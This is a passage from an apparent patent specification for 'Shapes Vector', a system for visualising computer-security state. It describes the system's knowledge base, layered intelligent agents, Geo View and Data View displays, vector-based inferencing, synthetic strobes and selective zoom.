2.1.3.1 Knowledge Base
The Knowledge object is essentially a knowledge base containing facts about the overall domain of discourse relevant to Shapes Vector. The knowledge is represented in terms of context-free Entities and Relationships, allowing for its efficient storage in a relational database. Entities constitute not only physical devices such as computers and printers, but also logical objects such as files and directories. Each entity possesses a set of security-relevant attributes, which are stored within the knowledge base. For each stored observation of an entity attribute, there is accompanying meta-data that includes the time of discovery, which agent or sensor discovered it and an expiry time for the data. The current knowledge base models several types of inter-entity relationships, including physical connectivity, physical or logical containment, bindings between processors and processes, roles of processes in client-server communications, origin and destination of packet entities, and so on.
2.1.3.2 Intelligent Agents and Ontologies
The Intelligent Agent macro-object encapsulates the artificial intelligence aspects of the Shapes Vector system. It specifically incorporates a (potentially very large) family of intelligent agent, software entities imbued with expert knowledge in some particular domain of discourse over which they may make deductions. Agents within the Shapes Vector systems are arranged into a series of “abstraction layers” or “logical levels” with each agent existing at only one such layer. Agents operate by accepting knowledge of a particular abstraction, possibly from several sources in lower layers, and generating new knowledge of a higher level of abstraction through a deductive process. An agent that resides at layer n of the Shapes Vector Knowledge Architecture must receive its input knowledge in the form of assertions in a knowledge representation known as the “Level n Shapes Vector ontology”. Any deductive product from such an agent is expressed in terms of the (more abstract) “Level n+1 Shapes Vector ontology”.
Entities in the Intelligent Agent macro-object can be broken into categories: data-driven entities and goal-driven entities. The former group is characterised by a processing model wherein all possible combinations of input facts are considered with an eye towards generating the maximum set of outputs. A common method employed being forward chaining. Goal-driven entities adhere to a different execution model: given a desirable output, combinations of inputs are considered until that output is indicated, or all combinations are exhausted.
Intelligent Agents and the goals and functionality of the Shapes Vector Knowledge Architecture are covered in more depth in Section 4 of this part of the specification and in Part 2 of the specification.
2.1.4 The Tardis
The Tardis is a real-time event management system. Its task is to schedule and translate the semantic deductions from Intelligent Agents and sensors into events capable of being visualised by the display module or sub-system. The Tardis also encapsulates the Shapes Vector system's notion of time. In fact, the operator can shift the system along the temporal axis (up to the present) in order to replay events, or undertake analyses as a result of speeded-up or slowed-down notions of system time.
2.1.5 Monitor
Monitor preferably renders three-dimensional (3D) views of objects and their interactions in real-time. As can be seen, there are a number of basic views defined all of which can be navigated. Each different view is based on a fundamental visualisation paradigm. For example, Geo View is based on location of virtual objects within a space-time definition, whereas Data View's location of virtual objects within its space is based on the data interaction.
Several reusable modules make up the composition of each view. These include elements such as data structures identifying the shapes, textures, and visual relationships permitted for each class of object, as well as common rendering methods for representing the view's Universe.
The paradigms for some of the views are discussed in more detail in later sections. It will be appreciated that the visualisation paradigms are in fact specific embodiments of the observational requirement of the system, wherein a human user can use one or more of their senses to receive information, that could include aural and haptic interaction.
2.2 The Hardware
In a preferred embodiment of this invention, the hardware architecture of the Shapes Vector system consists of a primary server equipped with a powerful computational engine and high-performance 3D graphics capabilities, a database server, a dedicated 100BaseT Ethernet network, one PC with specialised 3D audio hardware, and one PC with user input devices attached. A preferred configuration is shown schematically in FIG. 2.
The preferred observational environment of the Shapes Vector world can be rendered in 3D stereo to provide aural information and preferably viewed using Crystal Eyes™ shutter glasses synchronised to the display to provide purely visual information. Crystal Eyes™ was chosen for visualisation, as this product allows the user to be immersed in a 3D world on a large screen while still permitting real world interaction with fellow team-members and the undertaking of associated tasks, e.g. writing with a pencil and pad, that are features not available with head-mounted displays.
In addition to 3D graphics capabilities, there is a sound rendering board, which is used to generate multi-channel real-time 3D audio. Both the 3D graphics and sound rendering board make use of head tracking information in producing their output. The graphics renderer makes use of tracking information to alter the perspective of the displayed world so that the user experiences the effect of moving around a fixed virtual world. The sound renderer makes use of head movement tracking information to alter the sound-scape so that the user also experiences the effect of moving around in a fixed world with relevant sounds. That is, where a particular sound source will be perceived to be coming from the same fixed place irrespective of the users head movement. The perception of direction in 3D sound is enhanced by the ability to turn one's head and listen. For instance, it is often difficult to determine whether a sound is coming from in front or behind without twisting one's head slightly and listening to determine in which ear a sound is received first or loudest. These perceptive abilities are second nature to humans and utilisation of them is a useful enhancement of the information presentation capabilities of Shapes Vector.
A joystick and rudder pedals preferably provide the primary means of navigation in the 3D world. User input to the system is to be provided primarily through the touch screen and via voice recognition software running on a PC. Haptic actuators are realisable using audio components to provide a feeling of say roughness as the user navigates over a portion of the virtual world. Many other actuators are possible depending on the degree of feedback and altering required by the user.
The initial prototype of Shapes Vector had the user input/output devices connected to a workstation or PC with software connecting the remote peripherals with the User Interface proper. The layout of the Shapes Vector workstation (ie, the physical arrangement of the user interface hardware) will vary depending upon the operational role and the requirements of individual users, as described in the Appendix to Part 1 of the specifcation.
2.3 System Software
In the embodiment described herein Shapes Vector is implemented as a distributed system with individual software components that communicate between each other via TCP/IP sockets. A simple custom protocol exists for encoding inter-process communication. To limit performance degradation due to complex operating system interaction, the system processes are used only for relatively long-lived elements of control (e.g. the knowledge base server, or an intelligent agent). Shorter-lived control is implemented through threads.
FIG. 3 indicates where the primary software modules will be running in the initial system as well as a schematic of the hardware modules they are associated with. While most of the implementation of the Shapes Vector system has been custom-coded, the system does make use of a number of different software technologies to supply service functionality. Intelligent Agents make extensive use of NASA's CLIPS system as a forward chaining engine, and also use Quintus Prolog TM to implement backward chaining elements. Additionally, the knowledge base and its associated servers are preferably implemented using the Oracle TM relational database management system.
The graphics engine of the Display macro-object is preferably built upon an in-house C++ implementation of the Java 3D API and utilises OpenGL™ for the low-level rendering. The User Interface elements are built using Sun Visual Workshop™ to produce X Windows Motif™ GUI elements.
3 The “Classical” Visualisation Paradigm
The classical visualisation paradigm refers to methods that are derived from mechanisms such as geographic layout, and relatively static rules for objects. While some may not regard what is described here as entirely “classical”, it serves to distinguish some of the visualisation methods from the relatively more “bizarre” and therefore potentially more interesting visualisation paradigms described in this specification.
Using by way of example information security as the environment to be modelled and observed the fundamental basis of the classical visualisation paradigm is to associate a security-relevant attribute with a visual entity or a visual property of an entity, eg. shape, colour, or texture.
A Shapes Vector hypothesis is that any visualisation paradigm is not only “sensitive” to its application, ie. some paradigms are better suited to specific classes of application, but that the implementation of the paradigm is sensitive to the specific user. It is thus claimed that not only should a visualisation system be customable to take into account the type of application, but also it must have highly customable features to take into account individual requirements and idiosyncrasies of the observer. That is, the customisability of the system is very fine-grained.
In fine grained customable systems, it is important that journal records and roll-back facilities are available in the certain knowledge that users will make so many changes that they will “lose” their way and not be sure how to return to a visual setting they find more optimal than the one they are currently employing.
In an embodiment, users can associate attributes to shapes, colour, texture, etc. via manipulation of a master table, which describes all visual entities (with security-relevant attributes) the system is able to monitor. This table contains user-customable definitions for shapes, colours, and textures employed in the visualisation of the entity. For example, the security attribute “read enable” can be associated with different colours, transparencies or textures. Part of the essence of Shapes Vector involves utilising the visualisation process as a method for users to divine (via inductive inference) patterns in the “security cyberspace”. These patterns have an attached semantic. Typically, we expect users to note anomalies from the myriad system activities that represent authorised use of the system. Given these anomalies, the user will be able to examine them more closely via visualisation, or bring into play a set of Intelligent Agents to aid an in depth analysis by undertaking deductive inference.
Not withstanding the above, there is also a semantic gap between what an Intelligent Agent can deduce and what a user can discern using their senses. The approach in this embodiment is based on the hypothesis that in most cases the observational interface element will be employed for highlighting macro matters, while the agents will focus on micro matters. These micro deductions can be fed to the visualisation engine so that a user can observe potential overall state changes in a system, thereby permitting a user to oversee and correlate events in very large networks.
3.1 Geo View
Geo View is perhaps the most classical of the visualisation paradigms. Its basis is a two dimensional plane located in three-dimensional space. The plane represents the traditional geographic plane: location in the virtual plane represents the physical location of objects. FIG. 4 is a depiction of a small network where the primary points of interest involve a set of computers and the data that is flowing between them. The sizes, shape, and texture of objects all carry an associated semantic. The double pyramid shapes with a third pyramid embedded at the top are representative of computers with network interfaces. Also quite visible is the packet flow between the computers in the star network. Although not explained here, to the trained eye the start of a telnet session, some web traffic, as well as X Windows elements is also represented.
The Shapes Vector system permits a user to select classes of objects and render them above the plane. In fact it is possible to render different classes of objects at different levels above or below the geographic base plane. This rendering tactic allows a user to focus on objects of interest without losing them in the context of the overall system. This “selective zoom” facility is described further in Section 5.2 of this part.
FIG. 5 depicts a scene inside a machine object. In this view, two processors each with several processes are depicted. In an animated view of this scene the amount of processing power each of the processes is consuring is represented by their rate of rotation. Again, the size, texture, and specific aspects of their shape can and are used to depict various semantics.
The transparent cube depicts a readable directory in which is contained a number of files of various types.
In addition to the visualisation of various objects, the human observer can attach sounds and possibly haptic characteristics to objects. In particular, the system is capable of compiling a “sound signature” for an object (e.g. a process) and plays the resulting sound through speakers or headphones. This facility is quite powerful when detecting event changes that may have security significance. Indeed, in a concept demonstrator, a change in the code space of a process causes a distinct change in its sound. This alerts the user when listening to a process (e.g. printer daemon) with a well-known characteristic sound that something is not quite right. By inspecting the process visually, further confirmation can be forthcoming by noting that its characteristic appearance, e.g. colour, has changed. The use of haptic attributes can also be advantageous in certain circumstances.
One of the major issues that arise out of Geo View other than the basic geographic location of nodes, is the structural relationship of objects contained in a node. For example, how does one depict the structural relationship of files? FIG. 5 gives some indication of a preferred view in a directory containing files and possibly further directories is rendered in a particular way. In a system such as UNIX, there is an well-understood tree structure inherent in its file system. In other operating systems, the structure is not so precise. In the description so far, Geo View still lacks a level of structural integrity, but it must be realised that any further structure, which is imposed, may invalidate the use of the view for various applications or specific user requirements.
Shapes Vector avoids some of the problems posed above by providing a further level of customisation by permitting a user to specify the structural relationship between classes of objects from a predetermined list (e.g. tree, ring). A run-time parser has been constructed to ensure that any structural specification must satisfy certain constraints, which guarantee that “nonsensical”, or circular relationships, which are impossible to display, are not introduced.
• 1. Geo View is a three-dimensional virtual universe in which a real-world or virtual object may be represented by one or more virtual objects whose visual attributes are derived from attributes of the real-world object via a flexible user-specifiable mapping (called herein a “Master Table”). The placement of virtual objects typically having a shape within the universe is governed by the absolute or relative geographical location of the real-world object, and also by a flexible set of user-specified layout rules. Layout rules permit the specification of a structured layout for groups of shapes whose real-world objects and virtual objects have some cornrnonality. The list of structures includes, but is not limited to linear, grids, star, ring and graph.
• 2. Changes to the visual attributes of shapes (e.g., size or height above a plane) may be made dynamically by a user (human observer). Such changes may be applied to all shapes in the universe or to those which match user-specified criteria. This facility is termed herein “Selective Zoom”.
• 3. The user may configure Audio cues (sounds and/or voices) to denote the attributes of represented objects (through a Master-Table configuration), or to denote the occurrence of a real-world event. Such cues may be associated with a point in three-dimensional space (i.e., positional sound), or they may be ambient.
• 4. The representation of real-world objects with rapidly time-changing attributes may be simplified by the use of Synthetic Strobes, flexible user-specified filters which shift changes in the visual attributes of a shape from one time-domain to another. Synthetic Strobes may be applied across the entire universe or selectively according to a flexible user-specification. Such strobes may also be used to shift slow changes in the attributes of a shape into a faster domain (e.g., so that a human may perceive patterns in very slowly altering real-world objects).
• 5. A user may select shapes within a Geo View universe (either interactively or by a flexible user-specified condition) and choose to have the corresponding set of shapes in another view (e.g., a Data View or a different Geo View) highlighted in a visual manner. The specification of the condition defining correspondence of shapes between universes may be made in a flexible user-defined fashion.
A user may also specify structural arrangements to be used by Geo View in its layout functions. For example, “located-in”, “in-between”, and “attached-to” are some of the operators available. These allow a flexible layout of shapes and objects preserving user required properties without requiring specific coordinates being supplied for all objects.
3.2 Data View
A problem with Geo View is that important events can be missed if heavily interacting objects or important events are geographically dispersed and not sufficiently noticeable. In Section 5 of this part, we discuss mechanisms that can be utilised to avoid this problem in some circumstances. However, in this section we describe a preferred view that is also intended to address parts of this problem. Parts 3 and 4 of the specification provides a more detailed account of this approach. Geo View has its roots in depicting actions and events that have physical devices and their location as an overriding theme. Of course logical entities are shown, but again they have a geographic theme. Data View, as its name suggests, is intended to provide a view where the basic paradigm is simply one of data driven events (eg. byte transfer) rather than geographic location. Heavily interacting objects, eg. producers and consumers of data, can be depicted as being located “close together”. Unlike Geo View, where the location of an object tends to be relatively static during its lifetime (copying of files is simply a special case of bringing a new object into existence) interaction and data transfer between objects in Data View may be more dynamic. Thus, the location of objects is expected to be more dynamic. Therefore, rules are preferred so as to define the layout of objects not only from the perspective of whether interaction occurred, but also the amount of interaction, and the rate of interaction.
It is intended in a preferred embodiment to utilise Newtonian celestial mechanics and model interaction as forces on the interaction of objects as fundamental rules for the data view layout.
Each object has a mass that is based on its “size” (size is user defined eg. the size of a file or code in a process). User defined interaction between objects causes the equivalent of an electric charge to build. This charge is attractive, whereas “gravity” resulting from mass is repulsive. The build-up of charge tends to negate the force of gravity thereby causing objects to move closer together until some form of equilibrium is reached. Of course we need to adjust the basic Coulomb and Newton's laws in order for the forces to balance appropriately. To do so, we are lead to set axiomatically several calibration points. That is, we must decide axiomatically some equilibrium points; e.g. two objects of identical mass are in equilibrium X units apart with Y bytes per second flowing between them. Without these calibration points, the distance and motion of the objects may not provide optimal viewing. Further to this requirement, it can be inferred that the force formulae must be open to tinkering on a per user basis in order to permit each user to highlight specific interactions based on higher semantics related to the user's security mission. A further rule, which is preferred in this embodiment, is the rate of “decay” of charge on an object. Otherwise, interacting objects will simply move closer and closer together over time. This may be appropriate for some types of visual depiction for a user, but not for others. For example, retained charge is useful for a user to examine accumulative interaction over a time slice, but charge decay is a useful rule when examining interaction rates over a given time period.
The interaction mechanism described herein serves to indicate the basis for interaction between objects and their location in space to provide visual depiction of objects and their clusters for examination by a user in order to arrive at inductive hypotheses.
FIG. 6 shows how Data View might visualise a collection of data-oriented objects (eg. files and/or servers) which interact with one another to varying degrees. Despite using proximity to show whether an object is interacting with another, further visual mechanisms are needed for the user to be able to analyse the type of data interaction, and the current state of affairs of interaction within a specified time slice. Hence we still need visual markers which directly link one object to another, for example an open socket connection between two processes, which actually has data in transit. These objects could initially be very far apart due to previous low interaction status. However, since they are now interacting a specific connection marker may be needed to highlight this fact. Given the type of interaction, the force formulae may be adjusted so as to provide a stronger effect of interaction. However, this mechanism is restricted to classes of objects and the interaction type, whereas the user may be particularly interested in interaction between two particular object instances. Hence a visual marker link would be more appropriate. Yet, one can imagine the complexity of a view if all markers are shown simultaneously. Hence actual connection lines, their size, shape, colour, motion and location, may be switched on and off via a set of defined criteria.
As for Geo View, Data View in its preferred embodiment, will come with its own Master Table describing shapes and textures for various attributes, as well as an input mechanism to describe relationships between objects based on a series of interaction possibilities. The objects presented in Data View may in some cases be quite different from those found in Geo View, while in other cases they will be similar or identical. Clearly the defining difference lies in the fact that Data View's Master Table will focus less on physical entities and more closely on logical entities and data driven events.
Thus the preferred main features of Data View are as follows:
• 1. A set of one or more two-dimensional virtual universes in which a real-world object may be represented by one or more shapes whose visual attributes are derived from attributes of the real-world object via a flexible user-specifiable mapping (called a “Master Table”). In one embodiment each universe is represented as a disc in a plane. The placement of a shape within a universe is governed by degree of interaction between the represented object and other objects represented in that universe. As an alternative, the view may be constructed as a set of one or more three-dimensional virtual universes with similar properties.
• 2. Interaction between a pair of real-world objects causes the pair of shapes that represent them to be mutually attracted. The magnitude of this force is mathematically derived from the level of interaction. Real world Objects which interact are furthermore mutually repelled by a “gravitational force”, the magnitude of which is derived from attributes of the real-world objects in a flexible user-specified manner. In one embodiment all forces are computed as vectors in the plane of the universe. The velocity of a shape in the universe is proportional to the vector sum of the forces applied to the shape (i.e., in this embodiment there is no concept of acceleration).
• 3. Shapes within a universe may be tagged with what is termed herein a “flavor” if their real-world object's attributes match a flexible user-specified condition associated with that flavor. A pair of shapes may only attract or repel one another if they share one or more flavors.
• 4. Each shape within a universe maintains an explicit list of other shapes it “interacts” with. A pair of shapes may only attract or repel one another if each is in the interaction set of the other.
• 5. Each shape within a universe may have a “radius of influence” associated with it, a user-specified region of the universe surrounding the shape. A shape may only exert a force onto another shape if the latter is within the radius of influence of the former. The radius of influence of a shape may be displayed visually. The selection of which shapes in the universe have radii of influence, and which of those radii should be displayed, may be either universal or by means of a flexible user-specified condition.
• 6. Each shape within a universe may optionally be visually linked to one or more shapes in a different universe by a “Marker” which represents a relationship between the real-world objects represented by the shapes. The selection of which shapes in which universes should be so linked is by means of a flexible user-specified condition.
• 7. Changes to the visual attributes of shapes (e.g., size or height above a plane) may be made dynamically by a user. Such changes may be applied to all shapes in the universe or to those which match user-specified criteria. This facility is termed “Selective Zoom”.
• 8. The user may configure Audio cues (sounds and/or voices) to denote the attributes of represented objects, or to denote the occurrence of a real-world event. Such cues may be associated with a point in three-dimensional space, or they may be ambient.
• 9. The representation of real-world objects with rapidly time-changing attributes may be simplified by the use of Synthetic Strobes, flexible user-specified filters which shift changes in the visual attributes of a shape from one time-domain to another. Synthetic Strobes may be applied across the entire universe or selectively according to a flexible user-specification. Such strobes may also be used to shift slow changes in the attributes of a shape into a faster domain (e.g., so that a human may perceive patterns in very slowly altering real-world objects).
• 10. A user may select shapes within a Data View universe (either interactively or by a flexible user-specified condition) and choose to have the corresponding set of shapes in another view (e.g., a Geo View or a different Data View) highlighted in a visual manner. The specification of the condition defining correspondence of shapes between universes may be made in a flexible user-defined fashion.
4 Intelligent Agents
Shapes Vector can utilise large numbers of Intelligent Agents (IA's), with different domains of discourse. These agents make inferences and pass knowledge to one another in order to arrive at a set of deductions that permit a user to make higher level hypotheses.
4.1 Agent Architecture
In order to achieve knowledge transfer between agents which is both consistent and sound, ontology becomes imperative. The task of constructing a comprehensive ontology capable of expressing all of the various types of shapes is non-trivial. The principal complication comes from the fact that the structural elements of the ontology must be capable of covering a range of knowledge ranging from the very concrete, through layers of abstraction and ultimately to very high-level meta-knowledge. The design of a suite of ontological structures to cover such a broad semantic range is problematic: it is unlikely to produce a tidy set of universal rules, and far more prone to produce a complex family of inter-related concepts with ad hoc exceptions. More likely, due to the total domain of discourse being so broad, ontology produced in this manner will be extremely context sensitive, leading to many possibilities for introducing ambiguities and contradictions.
To simplify the problem of knowledge representation to a point where it becomes tractable, the Shapes Vector system chooses to define a semantic layering of its knowledge-based elements. FIG. 7 shows the basic structure of this knowledge architecture and thus the primary architecture of the set of Intelligent Agent's (AI's). At the very bottom of the hierarchy are factual elements, relatively concrete observations about the real world (global knowledge base). Factual element can draw upon by the next layer of knowledge elements: the simple intelligent agents. The communication of factual knowledge to these simple knowledge-based entities is by means of a simple ontology of facts (called the Level 1 Shapes Vector ontology). It is worthwhile noting that the knowledge domain defined by this ontology is quite rigidly limited to incorporate only a universe of facts—no higher-level concepts or meta-concepts are expressible in this ontology. This simplified knowledge domain is uniform enough that a reasonably clean set of ontological primitives can provide a concise description. Also, an agent may not communicate with any “peers” in its own layer. It must communicate with a higher agent employing higher abstraction layer ontology. These higher agents may of course then communicate with a “lower agent”. This rule further removes the chance of ambiguity and ontology complexities by forcing consistent domain restricted Ontologies.
An immediate and highly desirable consequence of placing these constraints on the knowledge base is that it becomes possible to represent knowledge as context free relations. Hence the use of relational database technology in storage and management of knowledge becomes possible. Thus, for simple selection and filtering procedures on the knowledge base we can utilise well known commercial mechanisms which have been optimised over a number years rather than having to build a custom knowledge processor inside each intelligent agent. Note that we are not suggesting that knowledge processing and retrieval is not required in an IA, but rather that by specifying certain requirements in a relational calculus (SQL preferably), the database engine assists us by undertaking a filtering process when presenting a view for processing by the IA. Hence the IA can potentially reap considerable benefits by only having to process the (considerably smaller) subset of the knowledge base which is relevant to the IA. This approach becomes even more appealing when we consider that the implementation of choice for Intelligent Agents is typically a logic language such as Prolog. Such environments may incur significant processing delays due to the heavy stack based nature of processing on modern Von Neumann architectures. However, by undertaking early filtering processes using optimised relational engines and a simple knowledge structure, we can minimise the total amount of data that is input into potentially time-consuming tree and stack based computational models.
The placement of intelligent agents within the various layers of the knowledge hierarchy is decided based upon the abstractions embodied within the agent and the knowledge transforms provided by the agent. Two criteria are considered in determining whether a placement at layer n is appropriate:
• would the agent be context sensitive in the level n ontology? If so, it should be split into two or more agents.
• does the agent perform data fusion from one or more entities at level n? If so, it must be promoted to at least level n+1 (to adhere to the requirement of no “horizontal” interaction)
Further discussion on intelligent agents and ontological issues can be found elsewhere in the specification.
4.2 Inferencing Strategies
The fundamental inferencing strategy underlying Shapes Vector is to leave inductive inferencing as the province of the (human) user and deductive inferencing as typically the province of the IA's. It is expected that a user of the system will examine deductive inferences generated by a set of IA's, coupled with visualisation, in order to arrive at an inductive hypothesis. This separation of duties markedly simplifies the implementation strategies of the agents themselves. Nevertheless, we propose further aspects that may produce a very powerful inferencing system.
4.2.1 Traditional
Rule based agents can employ either forward chaining or backward chaining, depending on the role they are required to fulfil. For example, some agents continuously comb their views of the knowledge base in attempts to form current, up to date, deductions that are as “high level” as possible. These agents employ forward chaining and typically inhabit the lower layers of the agent architecture. Forward chaining agents also may have data stream inputs from low level “sensors”. Based on these and other inputs, as well as a set of input priorities, these agents work to generate warnings when certain security-significant deductions become true. Another set of agents within the Shapes Vector system will be backward chaining (goal driven) agents. These typically form part of the “User Avatar Set”: a collection of knowledge elements which attempt to either prove or disprove user queries.
4.2.2 Vectors
While the traditional approach to inferencing is sufficient for simple IA's which deal principally in the domain of concrete fact, it is less suitable for agents (typically from higher layers) which must deal with uncertain and/or incomplete information. Typically, such agents operate in a more continuous knowledge domain than that underlying rule-based deductive inferencing, and as such are not easily expressed in either a purely traditional forward or backward chaining paradigm. For these higher level agents, we instead make use in this embodiment of an alternative inferencing strategy based upon notions of vector algebra in a multi-dimensional semantic space. This alternative strategy is employed in conjunction with more conventional backward chaining techniques. The use of each of the paradigms is dependent on the agent, and the domain of discourse.
Our vector-based approach to inferencing revolves around constructing an abstract space in which relevant facts and deductions may be represented by geometrical analogues (such as points and vectors), with the proper algebraic relationships holding true. In general, the construction of such a space for a large knowledge domain is extremely difficult. For Shapes Vector, we adopt a simplifying strategy of constructing several distinct deductive spaces, each limited to the (relatively small) domain of discourse of a single intelligent agent. The approach is empirical and is only feasible if each agent is restricted to a very small domain of knowledge so that construction of its space is not overly complex.
The definition of the deductive space for an IA is a methodical and analytical process undertaken during the design of the agent itself. It involves a consideration of the set of semantic concepts (“nouns”) which are relevant to the agent, and across which the agent's deductions operate. Typically this concept set will contain elements of the agent's layer ontology as well as nouns which are meaningful only within the agent itself. Once the agent's concept set has been discovered, we can identify within it a subset of ‘base nouns’—concepts which cannot be defined in terms of other members of the set (This identification is undertaken with reference to a semi-formal ‘connotation spectrum’ (a comparative metric for ontological concepts).
Such nouns have two important properties:
• each is semantically orthogonal to every other base noun, and
• every member of the concept set which is not a base noun can be described as a combination of two or more base nouns.
Collectively, an IA's set of n base nouns defines an n-dimensional semantic space (in which each base noun describes an axis). Deductions relevant to the agent constitute points within this space; the volume bounded by spatial points for the full set of agent deductions represents the sub-space of possible outputs from that agent. A rich set of broad-reaching deductions leads to a large volume of the space being covered by the agent, while a limited deduction set results in a very narrow agent of more limited utility (but easier to construct). Our present approach to populating the deductive space is purely empirical, driven by human expert knowledge. The onus is thus upon the designer of the IA to generate a set of deductions, which (ideally) populate the space in a uniform manner. In reality, the set of deductions which inhabit the space can get become quite.non-uniform (“clumpy”) given this empirical approach. Hence rigorous constraint on the domain covered by an agent is entirely appropriate. Of course this strategy requires an appropriate mechanism at a higher abstract layer. However, the population of a higher layer agent can utilise the agents below them in a behavioural manner thereby treating them as sub-spaces.
Once an agent's deductive space has been constructed and populated with deductions (points), it may be used to draw inferences from observed facts. This is achieved by representing all available and relevant facts as vectors in the multi-dimensional semantic space and considering how these vectors are located with respect to deduction points or volumes. A set of fact vectors, when added using vector algebra may precisely reach a deduction point in the space. In that situation, a deductive inference is implied. Alternatively, even in the situation where no vectors or combinations of vectors precisely inhabits a deduction point, more uncertain reasoning can be performed using mechanisms such as distance metrics. For example, it may be implied that a vector, which is “close enough” to a deduction point, is a weak indicator of that deduction. Furthermore, in the face of partial data, vector techniques may be used to hone in on inferences by identifying facts (vectors), currently not asserted, which would allow for some significant deduction to be drawn. Such a situation may indicate that the system should perhaps direct extra resources towards discovering the existence (or otherwise) of a key fact.
The actual inferencing mechanism to be used within higher-level Shapes Vector agents is slightly more flexible than the scheme we have described above. Rather than simply tying facts to vectors defined in terms of the IA's base nouns, we instead define an independent but spatially continuous ‘fact space’. FIG. 8 demonstrates the concept: a deductive space has been defined in terms of a set of base nouns relevant to the IA. Occupying the same spatial region is a fact space, whose axes are derived from the agent's layer ontology. Facts are defined as vectors in this second space: that is, they are entities fixed with respect to the fact axes. However, since the fact space and deduction space overlap, these fact vectors also occupy a location with respect to the base noun axes. It is this location which we use to make deductive inferences based upon fact vectors. Thus, in the figure, the existence of a fact vector (arrow) close to one of the deductions (dots) may allow for assertion of that deduction with a particular certainty value (a function of exactly how close the vector is to the deduction point). Note that, since the axes of the fact space are independent of the axes of the deductive space, it is possible for the former to vary (shift, rotate and/or translate, perhaps independently) with respect to the latter. If such a variation occurs, fact vectors (fixed with regard to the fact axes) will have different end-points in deduction-space. Therefore, after such a relative change in axes, a different set of deductions may be inferred with different confidence ratings. This mechanism of semantic relativity may potentially be a powerful tool for performing deductive inferencing in a dynamically changing environment.
An interesting aspect of our approach to vector-based deductive inference is that it is based fundamentally upon ontological concepts, which can in turn be expressed as English nouns. This has the effect that the deductions made by an agent will resemble simple sentences in a very small dialect of pseudo-English. This language may be a useful medium for a human to interact with the agent in a relatively natural fashion.
While the inferencing strategy described above has some unorthodox elements in its approach to time-varying probabilistic reasoning for security applications, there are more conventional methods which may be used within Shapes Vector IA's in the instance that the method falls short of its expected deductive potential.
As described above, the vector-based deductive engine is able to make weak assertions of a deduction with an associated certainty value (based on distances in n-Dimensional space). This value can be interpreted in a variety of ways to achieve different flavours of deductive logic. For example, the certainty value could potentially be interpreted as a probability of the assertion holding true, derived from a consideration of the current context and encoded world knowledge. Such an interpretation delivers a true probabilistic reasoning system. Alternatively, we could potentially consider a more rudimentary interpretation wherein we consider assertions with a certainty above a particular threshold (e.g. 0.5) to be “possible” within a given context. Under these circumstances, the system would deliver a possiblistic form of reasoning. Numerous other interpretations are also possible.
Frame based systems offer one well understood (although inherently limited) alternative paradigm. Indeed, it is expected that some IA's will be frame based in any case (obtained off the shelf and equipped with an ontological interface to permit knowledge transfer with the knowledge base).
Other agents based on neural nets, Bayesian, or statistical profiling may also inhabit the Agent macro-object.
4.3 Other Applications
The IA architecture lends itself to other applications. For example, it is not uncommon for Defence organisations and institutions to maintain many databases in just as many formats. It is very difficult for analysts to peruse these databases in order to gain some required insight. There has been much effort aimed at considering how particular databases may be structured in order for analysts to achieve their objectives. The problem has proved to be difficult. One of the major hurdles is that extracting the analysts' needs and codifying them to structure the data leads to different requirements not only between analysts, but also different requirements depending on their current focus. One of the consequences is that in order to structure the data correctly, it must be context sensitive, which a relational database is not equipped to handle.
Shapes Vector can overcome many of the extant difficulties by permitting knowledge and deduction rules to be installed into an IA. This IA, equipped with a flexible user interface and strictly defined query language, can then parse the data in a database in order to arrive at a conclusion. The knowledge rules and analyst-centric processing are encoded in the IA, not in the structure of the database itself, which can remain flat and context free. The Shapes Vector system allows incremental adjustment of the IA without having to re-format and restructure a database either through enhancement of the IA, or through an additional IA with relevant domain knowledge. Either the IA makes the conclusion, or it can provide an analyst with a powerful tool to arrive at low level deductions that can be used to arrive at the desired conclusion.
5 Synthetic Stroboscopes and Selective Zoom
In this section, we discuss two mechanisms for overcoming difficulties in bringing important events to the fore in a highly cluttered visual environment: Synthetic Strobes and Selective Zoom.
5.1 Synthetic Strobes
One of-the major difficulties with depicting data visually in a real-time system is determining how to handle broad temporal domains. Since the human is being used to provide inductive inference at the macro level, much data which needs to be represented visually may not be possible to show due to temporal breadth. For example, there may be a pattern in a fast packet stream, yet if we were to be able to see the pattern in the packet stream, other events which may also represent a significant pattern may be happening much more slowly (e.g. slowly revolving sphere). Yet the perception of both patterns simultaneously may be necessary in order to make an inductive hypothesis.
A scientist at MIT during World War Two invented a solution to this type of dilemma. By the use of a device (now well known in discos and dance studios) called a stroboscope, Edgerton was able to visualise patterns taking place in one temporal domain in another. One of the most striking and relatively recent examples was the visualisafion of individual water droplets in an apparent stream produced by a rapid impellor pump. The stream looked continuous, but viewed under the strobe, each water droplet became distinctly apparent.
We can use the same concept of strobes, ie. synthetic strobes, to bring out multi temporal periodic behaviour in the Shapes Vector visualisation process. With a synthetic strobe, we can visualise packet flow behaviour more precisely, while still retaining a view of periodic behaviour that may be occurring much more slowly elsewhere.
Since we have potentially many different events and objects within our view, it becomes necessary to extend the original strobe concept so that many different types of strobes can be applied simultaneously. Unlike the employment of photonic based strobes, which can interfere with each other, we are able to implement strobes based on:
• Whole field of view
• Per object instance
• Per object class
• Per object attribute
In addition, multiple strobes can be applied where each has complex periodic behaviour or special overrides depending on specific conditions. The latter can also be seen from the oscilloscope perspective where a Cathode Ray Oscilloscope is triggered by an event in order to capture the periodic behaviour. Naturally, with a synthetic strobe, quite complex conditions can be specified as the trigger event.
Just as in the days of oscilloscopes, it is important to be able to have variable control over the triggering rate of a strobe. Accordingly, control of the strobes is implemented via a set of rheostats.
5.2 Selective Zoom
In order to see a pattern, it is sometimes necessary to zoom out from a vista in order to gain a very high level view of activity in a network. While this can be quite useful, it is intuitive that important events for certain classes of object will fail to be noticed due to wide dispersal across the vista. If a class of objects typically have a large Representation compared to others, then zooming out to see a pattern across a large vista is appropriate. However, if the class of objects in question is small, then zooming out causes them to be less noticeable when compared to much larger objects.
Selective Zoom overcomes this difficulty and others of a similar ilk by providing two mechanisms. The first mechanism allows a user to change quickly the relative sizes of objects in relation to others. This permits a user to zoom out in order to see a large vista while still retaining a discernible view of specific objects. The second mechanism permits movement and projection of objects onto planes “above” or “below” the primary grids used to layout a view.
As can be seen in the following paragraphs, selective zoom provides a generalised translation and rotation mechanism in three-dimensional Cartesian space.
